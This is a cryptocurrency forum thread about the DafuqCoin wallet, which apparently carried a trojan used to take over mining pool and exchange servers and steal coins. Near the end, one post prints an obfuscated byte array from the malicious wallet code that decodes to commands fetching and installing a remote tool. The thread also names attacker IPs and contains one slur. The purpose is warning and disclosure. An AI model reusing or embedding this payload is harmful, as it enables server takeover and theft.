[ANN][DFQ] DafuqCoin | NO Premine | NO IPO | ★Now Exchanged★

[binaryclock]

I feel sorry for all pool ops and linux miners that installed this coin. It was bound to happen one day. Pool ops compiling when it launches, other people running the wallets to get a head start and such.

So let this be a lesson, don't take every crap coin and make a pool for it during launch without seeing the code.

I think we ALL must agree on one main rule:
When a new coin launches, put the source up 5 hours or so before launch.
When it is launch time put up the seed nodes with the genesis block, cryptomethcoin did it (1 hour before or so) and put the seeds up at exactly the right time, worked excellent!

This gives us the time to expect the code and set up everything correctly, i think every self respecting coin should do it. If they don't then boycot.

This is why people need to be smart, use chroot or VMs.

[1715181336]

1715181336

[alcamie]

dev, how fix that?

It's broke on windows. I am still trying to find out if the win-qt address are still valid with the network.
Theoretically you are fine, you don't even need a wallet and can do everything one by one and piece by piece using the blockchain only.
Unless dev did something foolish.
That error probably just means it can't find the network so if any coins have been sent, it's not reporting it, because it's unplugged/broke.
I didn't write the code so no clue.

Install linux on a box and move your wallet.dat across and put in ~/.dafuqcoin and launch "dafuqcoin-qt -rescan" This will import your windows wallet and all will be good.

You can even use live USB key of ubuntu.

I guess it was a good idea after all to not follow this sort of advice... (I could have lost all my dafuqcoin, and may-be some yacoin  )

Yep. Tooo DAFUQn right there I lost 90000 useless coins.

[g0re79]

This was indeed a disaster, but its good in long term - ppl will finally start to think before headlessly jumping into another shit coin.

[ghur]

*popcorns*

[ratty]

I'm curious how the malware actually worked. I'm trying to find the meat of it in the source code, where is the stuff being passed in? There's none of that wget stuff in the actual source code itself, at least on github. I'm not saying its not there, but I want to just see how they did this so I know what to look at for new altcoins. Was it in the binary distributions only? I see the system call that lets you pass things into it, but where is the meat of it?

[g0re79]

I'm curious how the malware actually worked. I'm trying to find the meat of it in the source code, where is the stuff being passed in? There's none of that wget stuff in the actual source code itself, at least on github. I'm not saying its not there, but I want to just see how they did this so I know what to look at for new altcoins. Was it in the binary distributions only? I see the system call that lets you pass things into it, but where is the meat of it?

Explanation + code here:

http://altcoinherald.com/dafuqcoin-pushes-altcoin-bar-even-lower-first-trojan-coin-launch/

[cryptohunter]

I'm curious how the malware actually worked. I'm trying to find the meat of it in the source code, where is the stuff being passed in? There's none of that wget stuff in the actual source code itself, at least on github. I'm not saying its not there, but I want to just see how they did this so I know what to look at for new altcoins. Was it in the binary distributions only? I see the system call that lets you pass things into it, but where is the meat of it?

Explanation + code here:

http://altcoinherald.com/dafuqcoin-pushes-altcoin-bar-even-lower-first-trojan-coin-launch/

so this wallet passed virustotal scanning?  the windows compiled qt?

[ratty]

Explanation + code here:

http://altcoinherald.com/dafuqcoin-pushes-altcoin-bar-even-lower-first-trojan-coin-launch/

Thank you, but that only links back to this thread, which doesn't tell which file the meat of the exploit is in. It is supposed to do a wget and install that trojan. The listed snippits for init.cpp, util.h and util.cpp are all there, but where that post says "the result" quotes code that is simply not in the source code.

[toolatetoberich?]

Can we get a slow clap started for OPs trust rating and the de facto validity of the btctalks "Trust" ratings in general?  Or the fact that the thread title or anything in the OP have not been changed to reflect the current nature of this coin?  How about for the people who are worried about losing their dafuq coins?  It is true that this forum operates on a different wavelength.

[ghur]

Can we get a slow clap started for OPs trust rating and the de facto validity of the btctalks "Trust" ratings in general?  Or the fact that the thread title or anything in the OP have not been changed to reflect the current nature of this coin?  How about for the people who are worried about losing their dafuq coins?  It is true that this forum operates on a different wavelength.

This forum is truly special.
Where else could you find a group that is seemingly technical minded enough to get their miners running and pools hosted, but still blindly trust executables posted by newly created accounts?

With the amount of shitcoins launched every day, I'm surprised it took this long.

[ratty]

[Koko]

Can we get a slow clap started for OPs trust rating and the de facto validity of the btctalks "Trust" ratings in general?  Or the fact that the thread title or anything in the OP have not been changed to reflect the current nature of this coin?  How about for the people who are worried about losing their dafuq coins?  It is true that this forum operates on a different wavelength.

Bitcontalk Forum: Dafuq Did I Just Read?

[Dimelord]

You scamming faggot. Stole all of my WC. Burn in hell scammer!!!!!!!!!! 

[g0re79]

I'm curious how the malware actually worked. I'm trying to find the meat of it in the source code, where is the stuff being passed in? There's none of that wget stuff in the actual source code itself, at least on github. I'm not saying its not there, but I want to just see how they did this so I know what to look at for new altcoins. Was it in the binary distributions only? I see the system call that lets you pass things into it, but where is the meat of it?

Explanation + code here:

http://altcoinherald.com/dafuqcoin-pushes-altcoin-bar-even-lower-first-trojan-coin-launch/

so this wallet passed virustotal scanning?  the windows compiled qt?

Nobody is doing this "unecessary" and "time consumpting" task novadays - miners are so greedy half-hearted whether they should still mine with tiny profit/loses or sell mining equipment, so nobody makes this easy tasks (don´t mention reading source code). Its their fault of course, but I can deeply understand that, since I turned off my rigs few days ago :/

[anyone4u]

DAFUQ COIN SPECIFICATIONS:
Here are the specifications for this quite unusual coin…

Algorithm : Scrypt PoW/PoD (Proof of Dafuq)<-----------
Block Time : 30 seconds
Difficulty Retarget : KGW
Max Coins : 100 Billion
Premine : No premine

I have no idea yet what proof of dafuq means but I am sure we will find out soon enough.

Dafuqcoin Hackers Strike Again

The operators of Dafuqcoin continue to wreak havoc across the crypto world.

Their first victim was scryptominers, an altcoin mining pool. Dafuqcoin's wallet contained malicious code, and once it was installed on Scryptominers' servers it opened the door to their other wallets, which Dafuqcoin proceeded to clean out.

Cryptokk, a peer-to-peer exchange, has been taken down now too, and coins were stolen. Right after the site's owner Dubiel installed Dafuqcoin, the attack started.

Cryptokk claims to have lost a small amount of funds, but it was enough to put Cryptokk on ice, perhaps permanently.

Whitecoin and Marinecoin mining pools have also been taken down.

The malicious code in Dafuqcoin's wallet has been discovered. You can view it in a post on the BitcoinTalk forum. The code essentially allows Dafuqcoin's team to take control of the server on which it's installed.

Follow Dubiel's advice and "just don’t install this".
http://thecoinfront.com/dafuqcoin-hackers-strike-again/

[ratty]

Still, nobody has been able to point to where the malicious code actually was. There is no "wget" in the source code. I'm not denying the existence of it, but how can we spot malware when it doesn't exist?

[anyone4u]

pot.suremine.com
suremine 1 point 3 days ago Damn , just checked and it looks like they have been hacked! "Our servers and DNS registrar were compromised on Tuesday, April 22, 2014 01:57:49 UTC/GMT. Redirect your miners to another pool until further notice. If you are still mining on any of our stratums, STOP immediately and switch to another pool. The IP that has accessed our server, proceeded to withdraw coins from our pool wallets over a period of 12 hours: 193.138.222.26 IP Trace: http://www.ip-adress.com/ip_tracer/193.138.222.26 We have regained access to our DNS registrar and have pointed all pools to this page. The extent of the damage is significant. We are doing everything in our power to recover coins from each of the multiple pools we run. Additional details on this to follow. Know that we will cover as much of the loss of coins from all of our pools that we can, and we will be back online as soon as possible." http://www.reddit.com/r/potcoin/comments/23otk7/scryptominers_has_gone_dark_for_many_hours_any/
https://bitcointalk.org/index.php?topic=575281.msg6334028#msg6334028 Re: [ANN][DFQ] DafuqCoin | NO Premine | NO IPO | ★Now Exchanged★ April 22, 2014, 06:58:38 AM
Be careful with this coin. This coin is a trojan coin.
193.138.222.9 is one of the exploiters address.
Now it's interesting as one of the devs sent me an msg asking to setup a pool which is clearly deceptive.
NO COIND REQUIRES ROOT TO RUN, NONE.
pcmerc~

[suremine]

Just to clarify https://pot.suremine.com has not been hacked, we spotted other pools that have been hacked.

Its a real shame pools have been affected by this hack, hopefully positives can be taken from these hackes and other pools will become more secure.

[Dassd]

This was indeed a disaster, but its good in long term - ppl will finally start to think before headlessly jumping into another shit coin.

[ice00]

Still, nobody has been able to point to where the malicious code actually was. There is no "wget" in the source code. I'm not denying the existence of it, but how can we spot malware when it doesn't exist?

It is not in plain text, but masked (I just report offset1, but there is even offset2):

Code:

static char offset1[218] =
  {
    0x63, 0x72, 0x76, 0x2f, 0x65, 0x67, 0x76, 0x22, 0x2f, 0x7b, 0x22, 0x6b,
    0x6c, 0x71, 0x76, 0x63, 0x6e, 0x6e, 0x22, 0x6e, 0x6b, 0x60, 0x72, 0x61,
    0x63, 0x72, 0x2f, 0x66, 0x67, 0x74, 0x22, 0x6e, 0x6b, 0x60, 0x72, 0x63,
    0x6f, 0x2f, 0x66, 0x67, 0x74, 0x22, 0x75, 0x65, 0x67, 0x76, 0x22, 0x65,
    0x6b, 0x76, 0x22, 0x3c, 0x2d, 0x66, 0x67, 0x74, 0x2d, 0x6c, 0x77, 0x6e,
    0x6e, 0x22, 0x30, 0x3c, 0x24, 0x33, 0x22, 0x7e, 0x7e, 0x22, 0x7b, 0x77,
    0x6f, 0x22, 0x2f, 0x7b, 0x22, 0x6b, 0x6c, 0x71, 0x76, 0x63, 0x6e, 0x6e,
    0x22, 0x6e, 0x6b, 0x60, 0x72, 0x61, 0x63, 0x72, 0x2f, 0x66, 0x67, 0x74,
    0x67, 0x6e, 0x22, 0x72, 0x63, 0x6f, 0x2f, 0x66, 0x67, 0x74, 0x67, 0x6e,
    0x22, 0x75, 0x65, 0x67, 0x76, 0x22, 0x65, 0x6b, 0x76, 0x22, 0x3c, 0x2d,
    0x66, 0x67, 0x74, 0x2d, 0x6c, 0x77, 0x6e, 0x6e, 0x22, 0x30, 0x3c, 0x24,
    0x33, 0x39, 0x61, 0x66, 0x22, 0x2d, 0x76, 0x6f, 0x72, 0x2d, 0x22, 0x3c,
    0x2d, 0x66, 0x67, 0x74, 0x2d, 0x6c, 0x77, 0x6e, 0x6e, 0x22, 0x30, 0x3c,
    0x24, 0x33, 0x39, 0x65, 0x6b, 0x76, 0x22, 0x61, 0x6e, 0x6d, 0x6c, 0x67,
    0x22, 0x6a, 0x76, 0x76, 0x72, 0x71, 0x38, 0x2d, 0x2d, 0x65, 0x6b, 0x76,
    0x6a, 0x77, 0x60, 0x2c, 0x61, 0x6d, 0x6f, 0x2d, 0x61, 0x6a, 0x6d, 0x69,
    0x67, 0x72, 0x6d, 0x6b, 0x6c, 0x76, 0x2d, 0x63, 0x78, 0x63, 0x78, 0x67,
    0x6e, 0x2c, 0x65, 0x6b, 0x76, 0x22, 0x3c, 0x2d, 0x66, 0x67, 0x74, 0x2d,
    0x6c, 0
  };

so, when executed:

Code:

 return (hashoffset(offset1, offset2, offset3));

it decodes the text and the wget popup.


This is not the right thread, but I would suggest a featurer for future coins to be implemented to prevent this kind of stealing of wallet:

When creating a Wallet for the first time it is request the time for "transaction stake": this will be the amount of blocks that are to be passed for a transaction to be still able to be canceled.
Typicall value should be 1 or 2 days. Once created, it cannot be change even by the wallet owner (otherwise if one get his wallet, he can port it to 0).

When another wallet receive the coins, as soos as the network accept them, they must be in a stake state for the amount of time previste by the sender.

If in this time a wallet is stealing, for sure the thief will transfer the coin in his wallet, but as the coins in "stake" even if confirmed, they cannot be transfered to another wallet.

When the original wallet owner find the missing coins, he can use a features for claim his coin back.
With this features it is request that 50%+1 of people that send or receive coins to this wallet say true to the question of repristinate the previous state (this must be before the stake finished).

So, an exchange can use this features to protect who sent money to him for trading, because it is in the interest of all the users to risristinate missing coins.

This can work even for pools, as it will be all the miners that receive coins that can claim for the repristinate of the previous state.

For the blockchains, the repristinate of state will be a new special transaction from new wallet to old wallet without the needing of stake, so the original owen can soon move the coins to another clean wallet.